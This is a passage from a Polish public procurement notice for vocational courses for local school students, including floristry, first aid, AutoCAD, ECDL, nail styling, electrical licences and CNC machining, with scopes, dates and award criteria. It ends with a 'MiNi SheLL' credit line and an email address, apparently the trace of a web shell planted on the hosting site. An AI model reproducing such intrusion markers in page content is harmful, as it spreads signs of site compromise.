Organizator szkolenia ma uprawnienia do prowadzenia kursów kierowców wózków jezdniowych z napędem silnikowym oraz wydawać odnośne zaświadczenia o ukończeniu kursu wg wzoru MEN.
Wykonawca zapewni odpowiednią ilość wózków do realizacji zajęć praktycznych oraz odpowiedni plac manewrowy w Brzegu i Grodkowie
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs florystyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z obowiązującymi przepisami
Zakres zajęć:
1.  Podstawowe zasady kompozycji , stopniowanie , grupowanie i rozkład materiału. Nauka o barwach.   
2. Bezpieczeństwo i higiena pracy w zawodzie florysty.
3. Podział i przegląd roślin ozdobnych znajdujących się w użyciu dla potrzeb dekoratorskich.
4. Rośliny cięte żywe. Zasady pielęgnacji po ścięciu.
5. Teoria bukietu. Ćwiczenia w układaniu bukietów : spiralnych i na manszetach. Florystyka okolicznościowa.
6. Narzędzia , naczynia i środki pomocnicze .Artykuły dekoracyjne i pomocnicze stosowane do artystycznego układania kwiatów.
7. Techniki tworzenia układów kompozycyjnych z roślin żywych. Florystyka funeralna. Zasady kompozycji   żałobnych , teoria wieńca.
8.  Zasady kompozycji w naczyniu , materiały pomocnicze. Tworzenie kompozycji w gąbce ,rożku , w   doniczkach.
9. Asortyment narzędzi florystycznych. Florystyka ślubna . Tworzenie bukietów i kompozycji ślubnych .   Dekoracja miejsc weselnych , kościołów , biżuteria florystyczna , przypinki dla pana młodego.
10 uczniów z Zespołu Szkół Rolniczych CKP w Grodkowie
70 godz. na jednego uczestnika, w tym 50 godz. zajęć praktycznych
16.01.2012r. - 31.01.2012r. (ferie zimowe)
Osoba posiadająca wiedzę i doświadczenie potwierdzone dokumentem
zaświadczenie o ukończeniu kursu
Organizator pokrywa koszty:
	materiałów szkoleniowych i pomocy dydaktycznych oraz innych kosztów udziału w kursie (np. ubezpieczenie),
	certyfikatu/świadectwa,
	sal szkoleniowych.
Materiały przeznaczone do zrealizowania kursu stanowią własność zamawiającego
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs pierwszej pomocy przedmedycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ocena stanu poszkodowanego. 
	Postępowanie z poszkodowanym nieprzytomnym. 
	Postępowanie w przypadku braku oddechu i krążenia. 
	Postępowanie w przypadku urazów. 
	Postępowanie w przypadku nagłych stanów. 
	Ewakuacja poszkodowanego.
Szkolenie powinno być przeprowadzone w formie zajęć pozalekcyjnych. Szkolenie powinno być prowadzone według wytycznych Czerwonego Krzyża oraz Europejskiej Rady Resuscytacji przez Instruktorów Pierwszej Pomocy Polskiego Czerwonego Krzyża i zakończyć się uzyskaniem przez uczestników szkolenia certyfikatu.
I gr. - 20 uczniów z Zespołu Szkół Rolniczych CKP w Grodkowie
16 godz. na jednego uczestnika
Luty , marzec 2012
instruktor mający ww. umiejętności potwierdzone odpowiednim dokumentem
Po zakończeniu kursu uczestnik otrzymuje świadectwo potwierdzające uczestnictwo w kursie
	Zeszyt ćwiczeń, który będzie uzupełniany podczas zajęć - dla każdego uczestnika szkolenia. 
	- Ćwiczenia na fantomach renomowanych firm. 
	ze wskaźnikami umożliwiającymi kontrolowanie poprawności wykonywanych ćwiczeń.

	- Wykonanie charakteryzacji urazów przy pomocy profesjonalnych środków do charakteryzacji.                                                                       
	- Instrukcję - repetytorium udzielania pierwszej pomocy dla każdego uczestnika 
	kursu przeznaczoną do noszenia zawsze przy sobie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9, 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs wizażu i autokreacji własnego wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z obowiązującymi przepisami
Zakres zajęć: 
-nauka makijażu z analizą kolorystyczną elementami charakteryzacji, stylizacji,
- praktyczne zajęcia na potrzeby własnej autokreacji jak również profesjonalnego wyglądu jaki jest koniecznie wymagany przy prezentacjach, przed kamerą czy na scenie,
- zgłębienie tajników makijażu na różnym stopniu zaawansowania (dla każdego opracowany zostanie autorski program zajęć dostosowany do indywidualnych wymaganych potrzeb). 
Zajęcia praktyczne w ilości co najmniej 2/3 trwania kursu
8 uczniów/uczennic  z Zespołu Szkół Rolniczych w Żłobiźnie 
40 godz. na jednego uczestnika
16.01.2012- 20.01.2012r.(ferie zimowe)
instruktor mający ww. umiejętności potwierdzone odpowiednim dokumentem
Po zakończeniu kursu uczestnik otrzymuje świadectwo potwierdzające uczestnictwo w kursie
Organizator pokrywa koszt:
	materiałów szkoleniowych, pomocy dydaktycznych i produktów niezbędnych do przeprowadzenia kursu, 
	inne koszty (np. ubezpieczenia)
	certyfikatu świadectwa.  
	Sal szkoleniowych.
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs komputerowy AutoCad.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z obowiązującymi przepisami
	wprowadzenie do ogólnych zasad działania programu, uruchamianie programu po instalacji,
	opcje ustawień programu,
	przygotowanie pasków narzędzi do własnych potrzeb i przestrzeni roboczych,
	wykorzystanie warstw, nadawanie cech obiektów,
	rysowanie linii i figur,
	narzędzia do oglądania rysunków - polecenia widok,
	edycja tekstów,
	zapisywanie i odzyskiwanie rysunków,
	rysowanie precyzyjne, modyfikacja rysunków, wymiarowanie rysunków,
	zastosowanie układów współrzędnych,
	zastosowanie uchwytów,
	kreskowanie,
	tworzenie i wstawianie bloków,
	wykonywanie rysunków płaskich (2D), tworzenie szablonów rysunkowych,
	zastosowanie rzutni,
	ustalanie parametrów  drukowania,
I gr. - 14 uczniów  z Zespołu Szkół Rolniczych w Żłobiźnie
30 godz. na jednego ucznia. Czas trwania zajęć: 14-25.02.2011r
03,10,17,24.03.2012
instruktor mający odpowiednie uprawnienia potwierdzone odpowiednim dokumentem 
	Świadectwo/certyfikat ukończenia kursu 
Organizator pokrywa koszt:
	sprzęt ( przenośne komputery z niezbędnym oprogramowaniem)do zrealizowania kursu
	materiałów szkoleniowych i pomocy dydaktycznych oraz innych kosztów udziału w kursie (np. ubezpieczenie),
	certyfikatu/świadectwa
	sal szkoleniowych
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 80.53.31.00-0, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kurs komputerowy ECDL Start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu będzie przygotowanie uczestników do uzyskania Europejskiego Certyfikatu Umiejętności Komputerowych na poziomie podstawowym . Wykonawca zapewni wszystkim uczestnikom kursu ECDL Start realizację programu wybranych  czterech modułów oraz możliwość przystąpienia do egzaminów  w ramach wszystkich siedmiu  modułach ECDL( z możliwością jednej poprawki). Wykonawca, na własny koszt,  zobowiązany jest do zorganizowania  i przeprowadzenia egzaminów na terenie miasta Brzeg lub pokryje koszt przejazdu uczestników szkolenia do certyfikowanej sali egzaminacyjnej. Wykonawca zapewni przeprowadzenie końcowych egzaminów przez certyfikowanych egzaminatorów zrzeszonych w Polskim Towarzystwie Informatycznym.
I gr. - 10 uczniów z Zespołu Szkół Ekonomicznych w Brzegu
II gr.- 10 uczniów z Zespołu Szkół Rolniczych CKP w Grodkowie
60 godz. na jednego ucznia. Czas trwania zajęć: 14-25.02.2011r
I gr.- styczeń- maj 2012 ( dwa razy w tygodniu po 4 godz.)
II gr.- 16-20.01.2012 ferie zimowe
instruktor mający odpowiednie uprawnienia potwierdzone odpowiednim dokumentem 
	Certyfikat ukończenia kursu według standarów Polskiego Towarzystwa Informatycznego  i Polskie Biuro ECDL
Organizator pokrywa koszt:
	sprzęt ( przenośne komputery z niezbędnym oprogramowaniem) do zrealizowania kursu
	materiałów szkoleniowych i pomocy dydaktycznych oraz innych kosztów udziału w kursie (np. ubezpieczenie),
	certyfikatu świadectwa
	sal szkoleniowych dostępem do internetu
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 80.53.31.00-0, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Kurs przedłużania i stylizacji paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Budowa skóry i płytki paznokciowej
2.Manicure biologiczny w stylizacji paznokcia
3.Połaczenie paznokcia z przedłużeniem
4.Uzupełnianie tipsów
5. Przedłużanie na szablonie
6.Żelowanie naturalnej płytki
7.Zajecia praktyczne
I gr. - 10 uczennic/uczniów z Zespołu Szkół Budowlanych w Brzegu
45 godz. na jednego ucznia
16.01.2012 - 26.01.2012 ( 9 dni po 5 godz.)
instruktor mający odpowiednie uprawnienia potwierdzone odpowiednim dokumentem 
	Świadectwo certyfikat ukończenia kursu 
Organizator pokrywa koszt:
	sprzęt ( przenośne komputery z niezbędnym oprogramowaniem)do zrealizowania kursu
	materiałów szkoleniowych i pomocy dydaktycznych oraz innych kosztów udziału w kursie (np. ubezpieczenie),
	certyfikatu/świadectwa
	sal szkoleniowych
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Kurs na uprawnienia energetyczne D i E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest przygotowanie kandydatów do egzaminu państwowego SEP w celu zdobycia kwalifikacji do samodzielnego wykonywania czynności w zakresie eksploatacji  i dozoru przy pracach związanych z urządzeniami elektrotechnicznymi. Program szkolenia powinien zostać tak opracowany aby przekazać niezbędna wiedzę zgodnie z wymaganiami prawa energetycznego z dnia 10 kwietnia 1997r. W cenie kursu należy uwzględnić opłaty związane z egzaminem kwalifikacyjnym przed komisją NOT powołaną przez prezesa URE  dla każdego uprawnienia. 
10 uczniów z Zespołu szkół Zawodowych nr 1 Brzeg ul. Słowiańska 1 
od 16.01-20.01.2012  godz. 8 00 do 1600
Wykonawca powinien zapewnić profesjonalna kadrę do przeprowadzenia zajęć posiadającą wiedze teoretyczna, przygotowanie pedagogiczne oraz uprawnienia w zakresie dozoru  i eksploatacji instalacji elektrycznych.
Świadectwo kwalifikacyjne NOT na uprawnienie E i D
Każdy uczestnik powinien otrzymać w trakcie kursy ciepły posiłek tzw. drugie danie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kurs podstaw obrabiarek CNC z wykorzystaniem systemu zero-osn i programu edgecam.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja przestrzeni roboczej obrabiarek CNC  układy współrzędnych w obrabiarkach CNC , położenie i oznaczenie osi NC, kierunki ruchów . 
Punkty zerowe i referencyjne obrabiarek CNC 
Sterowanie obrabiarek CNC rodzaje układów sterowania , realizacja ruchów narzędzi 
Budowa i przeznaczenie narzędzi tokarskich .
Budowa i zastosowanie narzędzi frezarskich .		
Praktyczna  obsługa wózków widłowych
10 uczniów z Zespołu Szkół Zawodowych nr 1     Brzeg ul. Słowiańska 1 
od 4.05 -30.05.2012
instruktor mający odpowiednie uprawnienia potwierdzone odpowiednim dokumentem 
Zaświadczenie o ukończeniu kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9, 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com